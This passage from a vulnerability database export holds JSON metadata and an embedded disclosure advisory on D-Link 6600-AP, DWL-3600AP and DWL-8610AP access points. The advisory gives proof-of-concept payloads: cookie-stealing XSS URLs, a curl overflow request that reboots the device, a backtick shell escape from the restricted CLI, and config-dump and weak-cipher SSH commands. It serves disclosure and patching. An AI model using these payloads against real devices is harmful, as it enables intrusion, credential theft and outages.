"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1631"
},
{
"db": "NVD",
"id": "CVE-2019-14336"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"date": "2019-08-01T00:00:00",
"db": "VULHUB",
"id": "VHN-146272"
},
{
"date": "2019-08-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"date": "2019-07-31T19:01:29",
"db": "PACKETSTORM",
"id": "153840"
},
{
"date": "2019-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1631"
},
{
"date": "2019-08-01T13:15:14.163000",
"db": "NVD",
"id": "CVE-2019-14336"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-146272"
},
{
"date": "2019-08-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1631"
},
{
"date": "2024-11-21T04:26:32.187000",
"db": "NVD",
"id": "CVE-2019-14336"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1631"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link 6600-AP and DWL-3600AP Device input validation vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1631"
}
],
"trust": 0.6
}
}
VAR-201908-0912
Vulnerability from variot - Updated: 2024-11-23 21:52
An issue was discovered on D-Link 6600-AP, DWL-3600AP, and DWL-8610AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated Certificate and RSA Private Key extraction through an insecure sslcert-get.cgi HTTP command. D-Link 6600-AP, DWL-3600AP, DWL-8610AP Devices have a certificate validation vulnerability. Information may be obtained. The D-Link 6600-AP is a wireless access point device from D-Link of Taiwan. A security vulnerability exists in the D-Link 6600-AP, DWL-3600AP, and DWL-8610AP. D-Link 6600-AP, etc.
Security Advisory - 22/07/2019
Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Note that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP
This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!
Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP
Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
Product Identifier
WLAN-EAP
Hardware Version
A2
Manufacturer
D-LINK
Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
List of Vulnerabilities
- CVE-2019-14338 - Post-authenticated XSS
- CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14337 - Escape shell in the restricted command line interface
- CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
- CVE-2019-14332 - Use of weak ciphers for SSH
1. Post-authenticated XSS
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14338
Proof-of concept
Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>
Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>
2. Pre-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID: CVE-2019-14333
Proof-of concept
kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
4. Escape shell in the restricted command line interface
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14337
Proof-of concept
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# `/bin/sh -c wget`
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options:
 -s Spider mode - only check file existence
 -c Continue retrieval of aborted transfer
 -q Quiet
 -P DIR Save to DIR (default .)
 -T SEC Network read timeout is SEC seconds
 -O FILE Save to FILE ('-' for stdout)
 -U STR Use STR for User-Agent header
 -Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
5. Post-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14335
Proof-of concept
http://10.90.90.91/admin.cgi?action=%s
6. Post-authenticated Dump all the config files
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14336
Proof-of concept
http://10.90.90.91/admin.cgi?action=
7. Use of weak ciphers
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14332
Proof-of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
admin@10.90.90.91's password:
Enter 'help' for help.
DLINK-WLAN-AP# help
Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days.
22/06/2019 : Public release of the security advisory to mailing list
Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
About me - pwn.sandstorm@gmail.com
Independent EMSecurity Researcher in the field of IoT under the Sun
Always open to hack and share
Greetings - Ack P. Kim and others for the online resources
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201908-0912",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dwl-8610ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "d-link 6600-ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-8610ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dwl-3600ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dwl-8610ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"db": "NVD",
"id": "CVE-2019-14334"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:6600-ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-3600ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-8610ap_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandstorm Security",
"sources": [
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1635"
}
],
"trust": 0.7
},
"cve": "CVE-2019-14334",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14334",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2019-29149",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-146270",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14334",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-14334",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14334",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-14334",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-29149",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-1635",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-146270",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"db": "VULHUB",
"id": "VHN-146270"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1635"
},
{
"db": "NVD",
"id": "CVE-2019-14334"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on D-Link 6600-AP, DWL-3600AP, and DWL-8610AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated Certificate and RSA Private Key extraction through an insecure sslcert-get.cgi HTTP command. D-Link 6600-AP , DWL-3600AP , DWL-8610AP Devices have a certificate validation vulnerability.Information may be obtained. The D-Link 6600-AP is a wireless access point device from D-Link of Taiwan. A security vulnerability exists in the D-Link 6600-AP, DWL-3600AP, and DWL-8610AP. D-Link 6600-AP, etc. # Security Advisory - 22/07/2019\n\n## Multiple vulnerabilities found in the D-Link 6600-AP device running\nthe latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced\nanymore but the support is still provided by D-Link as per described\non the D-Link website. Not that this product is built for business\ncustomers of D-Link and we can expect to have thousands of devices at\nrisk. Code base shared with DWL-3600AP and DWL-8610AP\n\n### This advisory is sent to D-Link the 22/05/2019\nMany Thanks to the D-Link Security Team for their prompt reactivity!\n\n### Affected Product\nD-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP\n\n### Firmware version\n4.2.0.14 Revision Ax date: 21/03/2019\n\n### Last version available\nhttps://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n### Product Identifier\nWLAN-EAP\n\n### Hardware Version\nA2\n\n### Manufacturer\nD-LINK\n\n## Product Description\nThe DWL-6600AP is designed to be the best-in-class indoor Access Point\nfor business environments. With high data transmission speeds, load\nbalancing features, it can be deployed as a standalone wireless Access\nPoint or used as the foundation for a managed wireless network. \nSource: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n## List of Vulnerabilities\n\n 1. CVE-2019-14338 - Post-authenticated XSS\n 2. 
CVE-2019-14333 - Pre-authenticated Denial of service leading to\nthe reboot of the AP\n 4. CVE-2019-14337 - Escape shell in the restricted command line interface\n 5. CVE-2019-14335 - Post-authenticated Denial of service leading to\nthe reboot of the AP\n 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)\n 7. CVE-2019-14332 - Use of weak ciphers for SSH\n\n### 1. Post-authenticated XSS\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14338\n#### Proof-of concept\n\nExample 1: http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\nExample 2: http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027Pwned\u0027)\u003c/script\u003e\n\n### 2. Pre-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID: CVE-2019-14333\n#### Proof-of concept\n kali# curl -X POST\n\u0027http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n### 4. Escape shell in the restricted command line interface\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14337\n#### Proof-of concept\n\nDLINK-WLAN-AP# wget\nInvalid command. \nDLINK-WLAN-AP# `/bin/sh -c wget`\nBusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. 
\nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet]\n[-O|--output-document FILE]\n [--header \u0027header: value\u0027] [-Y|--proxy on/off] [-P DIR]\n [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL\n\nRetrieve files via HTTP or FTP\n\nOptions:\n -s Spider mode - only check file existence\n -c Continue retrieval of aborted transfer\n -q Quiet\n -P DIR Save to DIR (default .)\n -T SEC Network read timeout is SEC seconds\n -O FILE Save to FILE (\u0027-\u0027 for stdout)\n -U STR Use STR for User-Agent header\n -Y Use proxy (\u0027on\u0027 or \u0027off\u0027)\n\nDLINK-WLAN-AP#\n\n### 5. Post-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14335\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=%s\n\n### 6. Post-authenticated Dump all the config files\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14336\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=\n\n### 7. Use of weak ciphers\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14332\n#### Proof-of concept\n\nroot@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1\nThe authenticity of host \u002710.90.90.91 (10.90.90.91)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. \nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added \u002710.90.90.91\u0027 (RSA) to the list of known hosts. \nadmin@10.90.90.91\u0027s password:\nEnter \u0027help\u0027 for help. \n\nDLINK-WLAN-AP# help\n\n## Report Timeline\n22/05/2019 : This advisory is sent to D-Link - the contents of this\nReport will be made public within 30 days. 
\n22/06/2019 : Public release of the security advisory to mailing list\n\n## Fixes/Updates\nftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip\nftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip\n\n\n## About me - pwn.sandstorm@gmail.com\n#### Independent EMSecurity Researcher in the field of IoT under the Sun\n#### Always open to hack and share\n#### Greetings - Ack P. Kim and others for the online resources\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14334"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"db": "VULHUB",
"id": "VHN-146270"
},
{
"db": "PACKETSTORM",
"id": "153840"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-14334",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "153840",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1635",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-29149",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-146270",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"db": "VULHUB",
"id": "VHN-146270"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1635"
},
{
"db": "NVD",
"id": "CVE-2019-14334"
}
]
},
"id": "VAR-201908-0912",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"db": "VULHUB",
"id": "VHN-146270"
}
],
"trust": 1.3824786333333332
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29149"
}
]
},
"last_update_date": "2024-11-23T21:52:00.519000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory",
"trust": 0.8,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"title": "Security Bulletin",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Patch for D-Link 6600-AP, DWL-3600AP, and DWL-8610AP Information Disclosure Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/177597"
},
{
"title": "D-Link 6600-AP , DWL-3600AP and DWL-8610AP Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95744"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1635"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-295",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146270"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"db": "NVD",
"id": "CVE-2019-14334"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html"
},
{
"trust": 1.7,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14334"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14334"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14335"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14333"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=%s"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027pwned\u0027)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14337"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/sslcert-get.cgi?"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14338"
},
{
"trust": 0.1,
"url": "https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action="
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"db": "VULHUB",
"id": "VHN-146270"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1635"
},
{
"db": "NVD",
"id": "CVE-2019-14334"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"db": "VULHUB",
"id": "VHN-146270"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1635"
},
{
"db": "NVD",
"id": "CVE-2019-14334"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"date": "2019-08-01T00:00:00",
"db": "VULHUB",
"id": "VHN-146270"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"date": "2019-07-31T19:01:29",
"db": "PACKETSTORM",
